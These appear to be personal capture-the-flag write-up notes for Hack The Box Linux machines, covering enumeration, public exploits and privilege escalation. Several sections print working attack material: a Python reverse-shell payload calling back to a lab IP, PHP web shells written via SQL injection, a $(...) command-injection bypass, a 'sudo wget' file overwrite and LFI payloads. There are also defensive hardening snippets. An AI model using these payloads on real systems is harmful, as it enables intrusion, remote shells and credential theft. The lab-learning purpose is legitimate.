# HTB : Linux

## Sense

<details>

<summary>Enumeration , Open-source exploit</summary>

1. Directory enumeration leads to credentials, with which we can log in to the website
2. A public exploit leads to command injection, giving direct access as root

</details>

## Nibbles

<details>

<summary>Initial ⇒ view-page-source , Directory Enumeration , Open-exploit<br>Privesc ⇒ sudo -l , ------------------------------</summary>

1. nmap gives 22 and 80. Port 80 serves a static HTML page; however, view-page-source reveals an interesting comment that discloses the directory `nibbleblog`
2. Gobuster on `http://$ip/nibbleblog` gives:
   1. admin.php: login page
   2. README: discloses the version `nibbleblog v4.0.3`
   3. /content: /content/private/users.xml leaks the username `admin`
3. A public code-execution exploit is available ⇒ <https://github.com/dix0nym/CVE-2015-6967>
4. Inside the shell, `sudo -l` gives `/home/nibbler/personal/stuff/monitor.sh`

</details>

## Node

<details>

<summary>------------------</summary>

1. Viewing the website (3000) gives some usernames, and checking `app.js` with Dev-Tools leaks the usernames & hashes.
2. Using these creds on the same website authenticates us as the `admin` account, from where I can download the backup file.
3. Decoding file.backup with base64 ⇒ file.zip; unzipping it gives a hash ⇒ cracking the hash gives SSH creds for user `mark`
4. `ps -auxx` shows 2 files running as user `tom`

</details>

## Solidstate

<details>

<summary>Initial ⇒ rsip , pop3<br>Privesc ⇒ pspy32 , script-modification</summary>

1. Exploiting `rsip` (4555) with default credentials leads to user enumeration and a password change.
2. Using those usernames with the changed password on `pop3` (110) leaks SSH creds in user `mindy`'s mail.
3. Getting a shell as `mindy` & running `pspy32` shows a script `/opt/tmp.py` running as root
4. Modifying the script and putting a reverse shell in it gives us a shell as root.

</details>

## Valentine

<details>

<summary>Initial ⇒ Directory Enumeration , Hexadecimal dump (xxd) , SSH passphrase crack<br>Privesc way 1 ⇒ history + tmux  ||  Privesc way 2 ⇒ dirtycow</summary>

1. Nmap gives 22, 80, 443 & `--script vuln` states 443 is vulnerable to `heartbleed`.
2. Interesting dir-enum finding: `/dev/hype_key`, which contains hexadecimal
3. `xxd -r -p` gives an ssh_private_key; for the passphrase, we can decrypt it via `openssl`
4. For privesc we have 2 paths:
   1. tmux
   2. dirtycow
5. `ps -pf` shows tmux is running & the history commands give the tmux socket path
   1. `tmux -S /.dev/dev_sess` ⇒ running this gives root
6. `uname -a` gives a 2012 kernel version; searchsploit gives the dirtycow exploit for this version
   1. `gcc -pthread dc.c -o c -lcrypt && chmod +x c && ./c` ⇒ gives a username `random`
   2. `su random` ⇒ gives root

</details>

## Poison

<details>

<summary>Initial ⇒ Enumeration , Log-poisoning ||  phpinfolfi.py || SSH<br>Privesc ⇒ Process check , internal network scan , port forwarding</summary>

1. Nmap gives 22, 80. Port 80 runs a website that allows reading local PHP files, and it is also vulnerable to LFI
   1. pwdbackup.txt ⇒ gives a base64-encoded password
   2. /etc/passwd ⇒ gives username `charix`
   3. phpinfo ⇒ file_upload is on (but unable to find either the functionality or the upload dir)
2. 1st way is SSH as charix, password = `Charix!2#4%6&8(0`
3. 2nd way of exploitation is log poisoning
4. 3rd way is using the phpinfolfi exploit {PayloadsAllTheThings}
   1. exploit :- <https://www.insomniasec.com/downloads/publications/phpinfolfi.py>
5. `ps -auxw` shows VNC is running & `netstat -anlp` gives ports 5801, 5901
6. After SSH tunneling, accessing port 5901 gives me a shell session as the root user

</details>

## Sunday

<details>

<summary>Initial ⇒ Finger (79) brute force<br>Privesc ⇒ Enumeration , sudo -l , wget , overwriting file/binary</summary>

1. Nmap gives the following result:
   1. 79: finger ⇒ nmap result discloses the usernames `sunny & sammy`
   2. 111: rpcbind
   3. 22022: SSH
2. Brute-forcing finger users using this tool :-

   <http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz>
3. Same as nmap, interesting usernames found: sammy & sunny; guessing the password `sunday` and doing SSH gives the shell
4. In the root location `(/)` there is an unusual directory `/backup` which contains a `shadow.backup` file, basically a backup of /etc/shadow; reading it gives hashes for both users `sammy & sunny`
5. `sudo -l` for both users gives:
   1. sammy: `wget` ⇒ we can read files, upload files
   2. sunny: /root/troll ⇒ we can run it as sudo (nothing beyond this)
6. Combining both, we can overwrite /root/troll using wget with our Python reverse shell
   1. `sudo wget http://10.10.14.5/shell.py -O /root/troll`

</details>

## Tartarsauce

<details>

<summary>Initial ⇒ Recon , Dirsearch , wpscan , manual check of WordPress plugins<br>Privesc ⇒ ----------------------</summary>

1. Only port 80 is open ⇒ static website; dir-enum gives /webservices, still nothing useful
2. Dir-enum inside /webservices gives /wp ⇒ the site is using WordPress
3. wpscan enumeration found nothing vulnerable; 3 plugins found:

```bash
[+] Name: akismet - v4.0.3 

[+] Name: brute-force-login-protection - v1.5.3

[+] Name: gwolle-gb - v2.3.10
Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
```

4. Manually checking the README of the plugins gives something interesting

```bash
== Changelog ==

= 2.3.10 =
* 2018-2-12
* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D
```

5. So basically the real version is 1.5.3; some recon shows one of the plugins, `gwolle-gb`, is vulnerable at this version
6. RFI in gwolle-gb v1.5.3 by visiting the link: <http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://ip/path>
7. Start a Python server, put a PHP reverse shell in it renamed to wp-load.php, curl it ⇒ shell

</details>

## Irked

<details>

<summary>Initial ⇒ IRC (6697) , open-exploit<br>Privesc level 1 ⇒ Enumeration + steg pass cracking <br>Privesc level 2 ⇒ script modification</summary>

1. 80 ⇒ an emoji is on the website, nothing else
2. 6697 ⇒ IRC running; googling it gives a public exploit, which gives a shell as user `ircd`
3. In `/home/djmardov/Documents` found a .backup file, which has the steg password
4. wget the image, crack it using the steg password and we get a new password which works for both ssh & su
5. Got a shell as `djmardov`; running linpeas.sh shows an unusual binary /usr/bin/viewuser; executing it gives this error:

```bash
sh: 1: /tmp/listusers: not found
```

6. Create an executable with the same name, insert a rev shell, run viewuser ⇒ shell as root

</details>

## Friendzone

<details>

<summary>Initial ⇒ Recon , combining file-upload via SMB & execution LFI <br>Privesc level 1 ⇒ recon , mysql creds<br>Privesc level 2 ⇒ Python Library Hijacking , script modification</summary>

1. Nmap & recon are as follows:
   1. 139/445 ⇒ SMB recon with anonymous login gives
      1. //10.10.10.123/Development ⇒ read & write access
      2. //10.10.10.123/general ⇒ creds.txt
   2. 80 ⇒ discloses the domain name `friendzone.red`
   3. 53 ⇒ DNS recon gives some subdomain names; useful: administrator1.friendzone.red
   4. `administrator1.friendzone.red` ⇒ login page (creds from SMB work here)
2. On `administrator1.friendzone.red` the dashboard takes 2 parameters, image_id & timestamp
3. timestamp is vulnerable to LFI; put a PHP rev-shell in `../../../etc/development` using SMB, and accessing it gives a shell as `www-data`
4. In `/var/www/mysql_data.conf`, db_user & db_pass are available, which work for ssh & su
5. After getting a shell as user `friend`, running pspy shows a Python script running as root, `/opt/server_admin/reporter.py`; on some line there is `import os`
6. In `/usr/lib/python2.7` there is os.py, which is writable; insert a rev shell in `os.py`, start a listener, got shell as root

</details>

## Swagshop

## Networked

<details>

<summary>Initial ⇒ File upload with double extension & exiftool to manipulate magic-bytes<br>Privesc level 1 ⇒ Recon in /home dir , cron files , Input manipulation<br>Privesc level 2 ⇒ sudo -l , Input manipulation in shell script</summary>

## Recon & Enumeration

#### port scan

```bash
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2
80/tcp  open  http        Apache httpd 2.4.29
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
443/tcp open  ssl/http    Apache httpd 2.4.29 <commonName=friendzone.red>
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu
```

#### directory scan

```bash
/wordpress
/server-status
```

#### <http://friendzone.red>

Just a basic web page, nothing here\
But there is an "Email us at: <info@friendzoneportal.red>", so we can use "friendzoneportal.red" for further enumeration

#### <https://friendzone.red>

Just a GIF, nothing informational

#### /wordpress

Forbidden (not useful)

## Samba Enumeration

I tried listing files & anonymous login ....... and succeeded; there is a file "creds.txt" present in the "general" directory, which gave me credentials for the admin user\
\
I tried them on ssh, ftp .... and failed\
Let's enumerate samba more

```bash
nmap --script smb-enum-shares.nse -p 445 10.10.10.123
```

After the recon, I got to know the path of all directories and files in samba; I will focus on those directories which are beneficial for me

```bash
\\10.10.10.123\Development:
Path: C:\etc\Development

\\10.10.10.123\general:
Path: C:\etc\general
```

## DNS Zone Transfer

Listing all domains for both "friendzone.red" & "friendzoneportal.red"\
and then adding all the domains to the /etc/hosts file

```bash
host -l friendzone.red 10.10.10.123
host -l friendzoneportal.red 10.10.10.123
```

At first I opened all domains with http .... but they returned the same page which I found on port 80\
then I opened all of them with https://, and I got a lot of domains which are working\
but there are 2 domains through which I solved the box\
\
<https://administrator1.friendzone.red/>  >> login page\
<https://uploads.friendzone.red/>    >> has upload functionality

## <https://administrator1.friendzone.red/>

I first tried incorrect creds and got the response "wrong"\
then I used the creds found in samba and got logged in; the page says "login success please visit dashboard.php"

#### /dashboard.php

the page says visit "image_id=a.jpg&pagename=timestamp",\
and in response I get a picture and a timestamp number; I think it's vulnerable to LFI

### <https://uploads.friendzone.red/>

I uploaded a php shell here, and it was successfully uploaded; time for LFI. I already have 2 parameters :-

## LFI

`/dashboard.php?image_id=a.jpg&pagename=timestamp`

#### LFI in image_id

I changed the value a.jpg => shell.php but got no reverse shell\
then I tried again and again, but didn't get anything ..... that's weird

#### directory scan

```bash
/login.php
/dashboard.php
/images
timestamp.php
```

/images\
there are only 2 images here, a.jpg and b.jpg\
it means my shell was not uploaded here; maybe there is another directory where my shell is uploaded

#### LFI in pagename

then the only option left is this; let's change the value to the directories and file names found in the scan\
\
timestamp > response shows the timestamp number\
\
login   >  response shows "wrong"\
\
I guess it's reflecting the content of the page-name inserted here; I think it's vulnerable to LFI\
to make sure, I am going to request the "php source code file"\
payload :-

```bash
pagename=php://filter/convert.base64-encode/resource=dashboard

i got dashboard source-code , we can also request php source-code for
login
upload
timestamp
```

## shell as www-data

After reading the source code of dashboard, I got to know that the parameter "pagename" takes the value, appends ".php" to it and then shows the content of that particular file\
I tried pagename=../../../../etc/passwd and failed, =/etc/passwd still failed; I think it's because it's adding a ".php" extension at the end of the file name\
But after samba enumeration, we know the "Development" & "general" directories are present in the "/etc/" directory\
\
Let's make an echo.php file, put it into one of the smb directories and then try to read it\
Unfortunately we don't have write permission in "general"; the only option left is "Development"

```bash
# command >>
smbclient -N //10.10.10.123/Development -c 'put echo.php'

# In URL >>
# pagename=../../../../../../etc/Development/echo
# or
# pagename=/etc/Development/echo
```

NOTE :-\
I did not add echo.php in the payload, as I already know that the script does it itself\
\
Both payloads are working fine; time to upload a reverse shell and BOOM....... we got the shell
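Why both payloads above work, and what the fix looks like, as an added Python model (not the box's dashboard.php): `os.path.join` discards the base directory when the second argument is absolute, and `..` segments walk out of it, so appending ".php" alone is no protection. The web root `/var/www/admin` is an assumption (the write-up never names it); the allowlist is the set of page names seen in the scan above.

```python
import os

# Assumed web root for dashboard.php; the write-up never names it.
PAGES_DIR = "/var/www/admin"
# Page names observed in the directory scan above: each maps to <name>.php.
ALLOWED_PAGES = {"login", "dashboard", "timestamp", "upload"}


def vulnerable_resolve(pagename: str, base_dir: str = PAGES_DIR) -> str:
    """Models what the write-up read out of dashboard.php: append '.php' and include.
    os.path.join drops base_dir when pagename is absolute, and '..' segments walk
    out of it, which is why both /etc/Development/echo payloads reach the same file."""
    return os.path.normpath(os.path.join(base_dir, pagename + ".php"))


def escapes_web_root(pagename: str, base_dir: str = PAGES_DIR) -> bool:
    """True when the naive resolution would include a file outside the web root."""
    base = os.path.normpath(base_dir)
    resolved = vulnerable_resolve(pagename, base_dir)
    return os.path.commonpath([base, resolved]) != base


def hardened_resolve(pagename: str, base_dir: str = PAGES_DIR):
    """Allowlist the page name first, then verify the final path still sits under
    base_dir. Returns the path to include, or None when the request is refused."""
    if pagename not in ALLOWED_PAGES:
        return None
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, pagename + ".php"))
    # Defence in depth: even if the allowlist were loosened later, refuse
    # anything that resolves outside the web root.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```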

## privesc www-data => friends

Found a mysql config file in the /var/www directory; inside it I got the credentials for user "friend"

```bash
db_user=friend

db_pass=Agpyu12!0.213$
```

we can do both ssh as well as switch user to get a shell as "friend"

## privesc friend => root

#### pspy

After running the script, I found a cronjob which is running a python script :-\
/opt/server_admin/reporter.py\
\
There is nothing much in the script, but it was importing the os library\
then I started searching for "os.py", in order to perform python library hijacking\
\
I found os.py and it is also writable .... great; let's insert a reverse shell at the bottom of the script "os.py"\
\
NOTE :-\
I removed the "os" prefix from the reverse shell as we are already injecting the payload into os.py\
\
Original payload :-

```python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
```

Modified payload :-

```python
import pty
import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.8",7777))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()
```

After injecting, I waited a few minutes to let the cronjob do its work, and after some time\
BOOM....... we got the shell as root.
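The defender's counterpart to the library hijack above, as an added Python check that is not part of the write-up: it parses a script's imports with `ast` (no execution), resolves each module the way the import system would, and flags any whose file or directory is writable by others or owned by an untrusted uid. The reporter-style script and the module directory in `demo_hijack_check` are constructed stand-ins for `/opt/server_admin/reporter.py` and `/usr/lib/python2.7`.

```python
import ast
import os
import stat
import sys
import tempfile


def imported_modules(source: str):
    """Top-level package names a script imports, found via the ast (no execution)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            names.add(node.module.split(".")[0])
    return sorted(names)


def writable_by_untrusted(path: str, trusted_uids=(0,)) -> bool:
    """True when group/world write bits are set or the owner is not a trusted uid:
    either lets an unprivileged user replace what root is about to import."""
    st = os.stat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    return st.st_uid not in trusted_uids


def risky_modules(module_names, search_path=None, trusted_uids=(0,)):
    """Resolve each module as the import system would (first directory on the
    path holding <name>.py wins) and report those an untrusted user could tamper
    with, through either the file itself or its containing directory."""
    search_path = list(sys.path if search_path is None else search_path)
    findings = {}
    for name in module_names:
        for directory in search_path:
            candidate = os.path.join(directory, name + ".py")
            if not os.path.isfile(candidate):
                continue
            if (writable_by_untrusted(candidate, trusted_uids)
                    or writable_by_untrusted(directory, trusted_uids)):
                findings[name] = candidate
            break  # first hit wins, exactly as `import` would behave
    return findings


def demo_hijack_check():
    """Constructed scenario: a private module directory with a world-writable
    os.py, and a reporter-style script that imports os. Returns the findings
    before and after the permissions are repaired."""
    lib = tempfile.mkdtemp(prefix="fake_lib_")      # stands in for /usr/lib/python2.7
    fake_os = os.path.join(lib, "os.py")            # constructed, not the real os.py
    with open(fake_os, "w") as fh:
        fh.write("# constructed stand-in module\n")
    os.chmod(fake_os, 0o666)                        # the weak state found on the box
    script = "import os\nfrom datetime import datetime\n"  # constructed reporter.py
    trusted = (os.getuid(),)  # the temp dir is ours, so our uid plays root's role here
    before = risky_modules(imported_modules(script), [lib], trusted)
    os.chmod(fake_os, 0o644)                        # repaired: owner-only write
    after = risky_modules(imported_modules(script), [lib], trusted)
    return before, after


if __name__ == "__main__":
    print(demo_hijack_check())
```

Run the same `risky_modules` over the real `sys.path` of the interpreter a root cron job uses, with the default `trusted_uids=(0,)`, to audit a live host.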

</details>

## Jarvis

<details>

<summary>Initial 1 ⇒ SQL-injection , Extracting PHPmyadmin creds , php shell upload<br>Initial 2 ⇒  Direct web-shell upload using SQL-injection<br>Privesc level 1 ⇒ sudo -l , command injection in python script<br>Privesc level 2 ⇒ linenum.sh , SUID , /bin/systemctl , fake service exploitation</summary>

## nmap

open ports :- 22, 80, 64999

## gobuster

directories found :-

server-status/, phpmyadmin/, room.php

## website (80)

There is a website running which has some functionality to check rooms (price, description, room name, rating .... etc.) and it seems exploitable through SQL injection; let's try .... but before that

## /phpmyadmin/&#x20;

There is a phpMyAdmin login page running on the website. Although I already tried the default credentials, I didn't get anything; we need credentials for that

## website (64999)

Nothing over here, just some text: "you have been blocked for xxx seconds, don't be bad"

## shell as www-data

### way 1 - shell upload via phpmyadmin

we are logged in.\
After looking at the application I got to know the application version, which is :- "phpmyadmin 4.8.0"\
\
let's look for any public exploit available for this :- `searchsploit phpmyadmin | grep '4.8'` & we got 2 exploits for that\
According to the payload we are able to do LFI and also LFI to RCE\
for that we have to first run a SQL query and then we have to visit the URL including the session id\
\
1st let's copy the session id => "phpmyadmin" cookie\
\
2nd run the SQL query

```sql
SELECT '<?php system($_GET["cmd"]);?>'
```

3rd visit the link including the session id and the command in the "cmd" parameter

```
http://10.10.10.143/phpmyadmin/index.php?cmd=id&target=db_sql.php%3f/../../../../../var/lib/php/sessions/sess_e3qctegac4saf72rocbl1541j26u7mqm
```

4th inject a reverse shell in the "cmd" parameter

### way 2 - Direct shell upload

As we know we can write a file using SQL injection & the web root is /var/www/html; let's try uploading a reverse shell. payload :-

```sql
union select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7 into OUTFILE '/var/www/html/rev.php'
```

let's visit the page and try the command injection <http://10.10.10.143/rev.php?cmd=whoami>; it works, so let's add the reverse shell command

## privesc www-data => pepper

#### sudo -l

I got a file "/var/www/Admin-utilities/simpler.py" which I can run with sudo (as pepper); first let's read "simpler.py"\
basically the script is used to\
-h     help\
-l     list attackers' ip addresses\
-s     check attack status\
-p     ping an ip address\
\
here in "-p" the exec() function is called, which executes the ping command; we can use command injection in this, but there is a list of forbidden characters :-\
`` ` `` , `-` , `|` , `||` , `~` , `&` , `&&` , `;`\
Note :- we can still use $(command) to do a command injection in the script

```bash
sudo -u pepper /var/www/Admin-utilities/simpler.py -p

xxx--script--xxx
xxx
xxxx
xxxxx
xxxx
xxx
Enter an ip: $(/bin/bash)
```

I got the shell as pepper, but it's not fully functional: the commands are running, but their output is not coming back on screen\
To fix this, I first create a shell script (shell.sh) in the /tmp directory, put a reverse shell in it and then do the command injection in "simpler.py" in order to execute my reverse shell script

```bash
sudo -u pepper /var/www/Admin-utilities/simpler.py -p

xxx--script--xxx
xxx
xxxx
xxxxx
xxxx
xxx
Enter an ip: $(/tmp/shell.sh)
```

And BOOM we got the shell as pepper
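The blocklist above fails because `$(...)` contains none of the forbidden characters. As an added example (Python, not the box's simpler.py), here is the check a defender would write instead: accept only a syntactically valid IP address and hand it to ping as one argv element, so no shell ever parses the input; the forbidden-character list is reproduced only to show what it misses.

```python
import ipaddress
import subprocess

# The character blocklist the write-up describes in simpler.py; kept here only so
# the weak check can be compared with the allowlist below.
FORBIDDEN = ["`", "-", "|", "||", "~", "&", "&&", ";"]


def blocklist_allows(user_input: str) -> bool:
    """Weak check: passes when none of the forbidden characters appear.
    '$(' is not on the list, so command substitution slips straight through."""
    return not any(token in user_input for token in FORBIDDEN)


def allowlist_target(user_input: str):
    """Strong check: accept only a syntactically valid IPv4 or IPv6 address.
    Returns the normalised address, or None when the input is rejected."""
    try:
        return str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return None


def build_ping_argv(user_input: str):
    """Build ping's argument vector. The target is a single argv element, never a
    fragment of a shell command line, so metacharacters carry no meaning even if
    validation were ever loosened. Returns None on rejected input."""
    target = allowlist_target(user_input)
    if target is None:
        return None
    return ["ping", "-c", "1", target]


def ping(user_input: str):
    """Run the validated ping without a shell (subprocess defaults to shell=False).
    Returns ping's exit status, or None when the target was rejected."""
    argv = build_ping_argv(user_input)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, timeout=10).returncode
```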

## privesc pepper => root

#### run linenum.sh

After running the script, we get a binary which both pepper and root can run => "/bin/systemctl"\
\
systemctl is a systemd utility which is responsible for controlling the systemd system and service manager. That is, it creates and manages services\
\
Let's create a malicious service and run it using systemctl and BOOM....... we got the shell as root.

</details>

## Mirai

<details>

<summary>-----------------</summary>

</details>

## Popcorn

<details>

<summary>Initial ⇒ PHPinfo ,  File-Upload<br>Privesc ⇒ Kernel Exploit ,  1 ⇒ Full-Nelson.c  ||  2 ⇒ Dirty-Cow</summary>

1. Website and SSH are open; directory enum gives 2 interesting dirs :- /test & /torrent
   1. /test ⇒ shows the phpinfo page (file upload is enabled)
   2. /torrent ⇒ login & sign-up page is running
2. After creating a user and signing in, I got an upload form which accepts only torrent files, nothing else (php webshell not allowed)
3. After uploading a .torrent file, we get another upload functionality for a screenshot
   1. uploading a php webshell gives success & the response discloses the upload path `/torrent/upload/`
   2. navigating to the path, we see our webshell; triggering it gives a reverse shell
4. `uname -a / uname -r` gives the vulnerable Linux version 2.6.37; uploading and executing either exploit gives us root.
   1. Full-Nelson.c ⇒ <https://www.exploit-db.com/exploits/15704>
   2. DirtyCow

</details>

## Haircut

<details>

<summary>Initial ⇒  RFI (curl) ⇒ PHP shell ⇒ RCE<br>Privesc ⇒   Find command , Screen-4.5.0 , pwnkit</summary>

1. On the website, able to perform RFI on a local/remote host (as curl is running in the background).
2. Used RFI to upload a php webshell, which can be triggered from site/uploads.
3. Got a shell as `www-data`; for privesc used pwnkit, leading to `root`
4. Alternate privesc ⇒ screen-4.5.0

</details>

## Blocky

<details>

<summary>Initial ⇒ wordpress scan , directory enumeration<br>Privesc ⇒ sudo -l , sudo su -</summary>

## Recon & Enum

#### port scan

```bash
PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
8192/tcp  closed sophos
25565/tcp open   minecraft
```

#### directory scan

```bash
/.php                 (Status: 403) [Size: 289]
/.html                (Status: 403) [Size: 290]
/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-login.php         (Status: 200) [Size: 2397]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/readme.html          (Status: 200) [Size: 7413]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.php                 (Status: 403) [Size: 289]
/.html                (Status: 403) [Size: 290]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://blocky.htb/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 298]
```

#### wordpress scan

nothing interesting over here

## website

#### <http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/>

there is nothing much on the website, but if you click on the post (the only post available on the web page) you find the username "notch"

<img src="/files/vIx9g6TdLJnWIXJmU7tm" alt="" data-size="original">

#### <http://blocky.htb/plugins/files/>

I found 2 jar files over here, then I used jd-gui to discover the content

### blockycore.jar

I found the root password in this file

<img src="/files/M6fKTSb4omXNgJv6Kwj3" alt="" data-size="original">

## shell as notch

now we have 2 usernames :- notch & root and 1 password :- 8YsqfCTnvxAUeduzjNSXe22\
\
I tried notch with the password and it worked; I got the shell

## privesc notch => root

```bash
sudo -l
# >> I can run all commands as user

sudo /bin/bash
# >> I got a shell as root
```

</details>

## Frolic

<details>

<summary>Initial ⇒ Enumeration , Encrypt/Decrypt , open-source exploit RCE in <code>playsms</code> <br>Privesc ⇒ Buffer overflow x-x-x-x SKIPPING x-x-x-x </summary>

## Recon & Enum

### port scan

```bash
PORT     STATE SERVICE
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1880/tcp open  vsat-control
9999/tcp open  abyss
```

HTTP pages on ports 1880 & 9999

### smb enumeration

nothing interesting over here

### directory scan

#### <http://10.10.10.111:1880>

```bash
http://forlic.htb:1880/
http://forlic.htb:1880/icons
http://forlic.htb:1880/projects
http://forlic.htb:1880/settings
http://forlic.htb:1880/vendor
http://forlic.htb:1880/red
http://forlic.htb:1880/red/images
http://forlic.htb:1880/red/about
http://forlic.htb:1880/vendor/jquery
http://forlic.htb:1880/Icons
http://forlic.htb:1880/vendor/jquery/css
http://forlic.htb:1880/Projects
http://forlic.htb:1880/Settings
http://forlic.htb:1880/vendor/ace
http://forlic.htb:1880/vendor/ace/snippets
http://forlic.htb:1880/ICONS
http://forlic.htb:1880/vendor/ace/LICENSE
http://forlic.htb:1880/nodes
```

#### <http://10.10.10.111:9999>

```bash
http://10.10.10.111:9999/
http://10.10.10.111:9999/admin
http://10.10.10.111:9999/test
http://10.10.10.111:9999/backup
http://10.10.10.111:9999/.html
http://10.10.10.111:9999/admin/js
http://10.10.10.111:9999/admin/css
http://10.10.10.111:9999/dev
http://10.10.10.111:9999/backup/user.txt
http://10.10.10.111:9999/backup/password.txt
http://10.10.10.111:9999/dev/test
http://10.10.10.111:9999/dev/backup
http://10.10.10.111:9999/admin/.html
http://10.10.10.111:9999/admin/index.html
http://10.10.10.111:9999/dev/.html
http://10.10.10.111:9999/test/index.php
http://10.10.10.111:9999/dev/backup/index.php
http://10.10.10.111:9999/dev
http://10.10.10.111:9999/backup/password.txt
http://10.10.10.111:9999/backup/user.txt
http://10.10.10.111:9999/dev/test
http://10.10.10.111:9999/dev/backup
http://10.10.10.111:9999/admin/js/login.js
http://10.10.10.111:9999/backup/index.php
http://10.10.10.111:9999/admin/.html
http://10.10.10.111:9999/admin/index.html
http://10.10.10.111:9999/loop
http://10.10.10.111:9999/backup/loop
http://10.10.10.111:9999/loop/loop
http://10.10.10.111:9999/backup/loop/loop
http://10.10.10.111:9999/backup/loop/loop/loop
http://10.10.10.111:9999/loop/loop/loop
http://10.10.10.111:9999/loop/loop/loop/loop
```

## <http://10.10.10.111:9999>

nginx server default page is running on it\
and it also discloses the domain name :- <http://forlic.htb>

## <http://10.10.10.111:1880>

A Node-RED login page is running on it; I need creds for that

## <http://10.10.10.111:9999/test/>

we got php-info; after checking a little I got this :-\
allow_url_include Off, this means LFI is not possible

## <http://10.10.10.111:9999/backup/>

I got 2 files & 1 directory\
user.txt = admin\
password.txt = imnothuman\
loop = nil\
\
I tried these creds on the node-red login page but it failed

## <http://10.10.10.111:9999/dev/backup/>

```bash
/playsms
```

## <http://10.10.10.111:9999/admin/>

another login page, but when I try to intercept the request I get nothing; in the source code I found a file :- login.js. This file was also found by feroxbuster & it contains the creds for this page :-\
\
username = admin, password = superduperlooperpassword_lol

```javascript
var attempt = 3; // Variable to count number of attempts.
// Below function executes on click of login button.
function validate() {
    var username = document.getElementById("username").value;
    var password = document.getElementById("password").value;
    if (username == "admin" && password == "superduperlooperpassword_lol") {
        alert("Login successfully");
        window.location = "success.html"; // Redirecting to other page.
        return false;
    }
    else {
        attempt--; // Decrementing by one.
        alert("You have left " + attempt + " attempt;");
        // Disabling fields after 3 attempts.
        if (attempt == 0) {
            document.getElementById("username").disabled = true;
            document.getElementById("password").disabled = true;
            document.getElementById("submit").disabled = true;
            return false;
        }
    }
}
```

after successful login we get redirected to :- <http://10.10.10.111:9999/admin/success.html>\
and this page contains :-\
\
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! 